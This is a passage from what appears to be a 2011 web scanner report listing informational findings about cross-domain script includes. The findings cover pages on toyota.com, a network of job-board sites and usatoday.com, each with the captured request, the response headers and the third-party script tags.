<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.421. http://www.toyota.com/dealers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /dealers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dealers/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Date: Fri, 21 Jan 2011 18:46:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-U
...[SNIP]...
</script>
       <script charset="UTF-8" type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3&mkt=en-us"></script>
...[SNIP]...

15.422. http://www.toyota.com/ideas-for-good/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /ideas-for-good/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ideas-for-good/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Fri, 21 Jan 2011 19:53:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:29 GMT
Content-Length: 23165
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Toyota Ideas for Good</title>
       <meta http-equiv="Cont
...[SNIP]...
<meta property="og:image" content="http://www.toyota.com/ideas-for-good/img/idfFacebook.gif" />
       
       <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</script> -->
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script> -->
       <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

15.423. http://www.toyota.com/mobilepromo/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /mobilepromo/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobilepromo/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Fri, 21 Jan 2011 19:53:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67809

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />        
       <title>Toyota Mobile - Offer
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=b01bb889-2690-43e8-b632-96748b9dd9e5&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cmyspace%2Cdelicious%2Cstumbleupon%2Cdigg%2Cgoogle_bmarks%2Creddit%2Cyahoo_bmarks"></script>
...[SNIP]...

15.424. http://www.toyota.com/safety/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /safety/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /safety/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Date: Fri, 21 Jan 2011 19:53:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71448


<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Toyota Safety - Safety Technology on all Toyota Vehicles</
...[SNIP]...
</script>                
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=b01bb889-2690-43e8-b632-96748b9dd9e5&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cmyspace%2Cdelicious%2Cstumbleupon%2Cdigg%2Cgoogle_bmarks%2Creddit%2Cyahoo_bmarks"></script>
...[SNIP]...

15.425. http://www.toyota.com/toyota-care/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /toyota-care/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /toyota-care/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Fri, 21 Jan 2011 19:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69486


<!DOCTYPE html>
<html lang="en">
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<title
...[SNIP]...
<![if gte IE 7]><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=b01bb889-2690-43e8-b632-96748b9dd9e5&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cmyspace%2Cdelicious%2Cstumbleupon%2Cdigg%2Cgoogle_bmarks%2Creddit%2Cyahoo_bmarks"></script>
...[SNIP]...

15.426. http://www.tradingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pce4hd53hci195b2auvv59a984; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.427. http://www.trainingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trainingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0n2gu3r3aojtk5vp93nt6cf8v7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.428. http://www.transportationcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.transportationcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=881r6dutr10j1cvgkdbt4hp5m4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 126822

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.429. http://www.travelingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n1fl3n2dn89nmcpmn2rdp35b86; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111343

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.430. http://www.truckingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truckingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:38 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9omtff16do0dj8ujh5beudm8q4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109322

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.431. http://www.tvcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4enm9d2hf1rq1gm38rib9qh690; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101357

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.432. http://www.underwritingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.underwritingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0or8bng4g6nt9r0eep9e4acqb4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103082

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.433. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /money/world/2011-01-20-chinabuilding20_ST_N.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /money/world/2011-01-20-chinabuilding20_ST_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 22 Jan 2011 01:23:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 71520
Content-Type: text/html


